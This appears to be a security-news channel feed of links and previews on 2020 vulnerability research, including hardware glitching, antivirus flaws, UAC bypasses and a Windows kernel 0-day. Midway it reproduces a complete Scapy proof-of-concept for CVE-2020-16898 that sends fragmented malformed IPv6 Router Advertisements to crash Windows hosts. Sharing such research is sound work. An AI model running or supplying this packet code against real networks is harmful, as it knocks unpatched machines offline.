Bypassing Android MDM Using Electromagnetic Fault Injection By A Gas Lighter For $1.5
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
SpeedPwning VMware Workstation
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
Cyberark
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
This blog entry is a special anti-malware edition showcasing how the most common bugs security products suffer from can allow a standard user to escalate into a privileged user. What we found...
Release the Kraken: Fileless APT attack abuses Windows Error Reporting service
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
Bypassing Trend Micro Web Threat Protection via Punycode
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
www.inputzero.io
Bypassing Trend Micro Web Threat Protection via Punycode
TrendMicro Web Threat Protection - Bypass
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898)
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Introducing MIDNIGHTTRAIN - A Covert Stage-3 Persistence Framework weaponizing UEFI variables
https://slaeryan.github.io/posts/midnighttrain.html
https://slaeryan.github.io/posts/midnighttrain.html
Let’s build a high-performance fuzzer with GPUs!
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
The Trail of Bits Blog
Let’s build a high-performance fuzzer with GPUs!
TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt…
The Many Faces of Emotet
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
Active Directory (AD) Attacks & Enumeration at the Network Layer
https://www.lares.com/blog/active-directory-ad-attacks-enumeration-at-the-network-layer/
https://www.lares.com/blog/active-directory-ad-attacks-enumeration-at-the-network-layer/
Lares
Active Directory (AD) Attacks & Enumeration at the Network Layer
Intro Defending an Active Directory environment, particularly a large one, is a daunting task. Telemetry generated by Active Directory itself as well as the hosts connected to it are critical…
Abusing Teams client protocol to bypass Teams security policies
https://o365blog.com/post/teams-policies/
https://o365blog.com/post/teams-policies/
Aadinternals
Abusing Teams client protocol to bypass Teams security policies
Administrators can use teams policies for controlling what users can do in Microsoft Teams.
In this blog, I’ll show that these policies are applied only in client and thus can be easily bypassed.
In this blog, I’ll show that these policies are applied only in client and thus can be easily bypassed.
Forwarded from Noise Security Bit (AM)
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
UAC bypasses from COMAutoApprovalList
https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
Blogspot
UAC bypasses from COMAutoApprovalList
Intro (This post is made with permission of Arush Agarampur - an original author of all methods described below). Here and below we assu...